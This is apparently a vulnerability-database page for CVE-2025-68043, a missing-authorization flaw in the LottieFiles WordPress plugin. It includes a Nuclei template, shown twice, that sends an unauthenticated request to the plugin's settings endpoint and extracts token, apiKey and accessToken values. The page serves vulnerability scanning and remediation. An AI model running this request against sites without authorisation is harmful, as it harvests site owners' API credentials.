LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization

CVE-2025-68043

Verified

Description

LottieFiles LottieFiles <= 3.0.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers exploit missing authorization, exploit requires no special privileges.

Severity

High

CVSS Score

7.3

Exploit Probability

Affected Product

lottiefiles

Published Date

March 24, 2026

Template Author

pussycat0x

CVE-2025-68043.yaml

id: CVE-2025-68043

info:
  name: LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization
  author: pussycat0x
  severity: high
  description: |
    LottieFiles LottieFiles <= 3.0.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers exploit missing authorization, exploit requires no special privileges.
  impact: |
    Attackers can bypass authorization to access or modify restricted resources, potentially leading to data exposure or unauthorized actions.
  remediation: |
    Update to the latest version beyond 3.0.0.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lottiefiles/lottiefiles-300-missing-authorization
    - https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve
    - https://plugins.svn.wordpress.org/lottiefiles/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cwe-id: CWE-862
    cve-id: CVE-2025-68043
    epss-score: 0.01771
    epss-percentile: 0.82888
  metadata:
    verified: true
    max-request: 1
    vendor: lottiefiles
    product: lottiefiles
    framework: wordpress
  tags: cve,cve2025,wordpress,wp-plugin,lottiefiles,vkev

http:
  - raw:
      - |
        GET /wp-json/lottiefiles/v1/settings/ HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "is_block_logged_in"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"token"\s*:\s*"([^"]+)"'
          - '"apiKey"\s*:\s*"([^"]+)"'
          - '"accessToken"\s*:\s*"([^"]+)"'
# digest: 4a0a00473045022064648e482cb1abbd751aba9614c5fc0ccd7ae299aea17a06a879bec0e2eea81a022100a4dd7dc85a48c033d8965f0c1471852207cabfd889f5ba911dbb0a1af016a40d:922c64590222798bb761d5b6d8e72950

7.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE ID:

cve-2025-68043

CWE ID:

cwe-862

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lottiefiles/lottiefiles-300-missing-authorization https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve https://plugins.svn.wordpress.org/lottiefiles/

Remediation Steps

Update to the latest version beyond 3.0.0.

id: CVE-2025-68043

info:
  name: LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization
  author: pussycat0x
  severity: high
  description: |
    LottieFiles LottieFiles <= 3.0.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers exploit missing authorization, exploit requires no special privileges.
  impact: |
    Attackers can bypass authorization to access or modify restricted resources, potentially leading to data exposure or unauthorized actions.
  remediation: |
    Update to the latest version beyond 3.0.0.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lottiefiles/lottiefiles-300-missing-authorization
    - https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve
    - https://plugins.svn.wordpress.org/lottiefiles/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cwe-id: CWE-862
    cve-id: CVE-2025-68043
    epss-score: 0.01771
    epss-percentile: 0.82888
  metadata:
    verified: true
    max-request: 1
    vendor: lottiefiles
    product: lottiefiles
    framework: wordpress
  tags: cve,cve2025,wordpress,wp-plugin,lottiefiles,vkev

http:
  - raw:
      - |
        GET /wp-json/lottiefiles/v1/settings/ HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "is_block_logged_in"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"token"\s*:\s*"([^"]+)"'
          - '"apiKey"\s*:\s*"([^"]+)"'
          - '"accessToken"\s*:\s*"([^"]+)"'
# digest: 4a0a00473045022064648e482cb1abbd751aba9614c5fc0ccd7ae299aea17a06a879bec0e2eea81a022100a4dd7dc85a48c033d8965f0c1471852207cabfd889f5ba911dbb0a1af016a40d:922c64590222798bb761d5b6d8e72950

LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps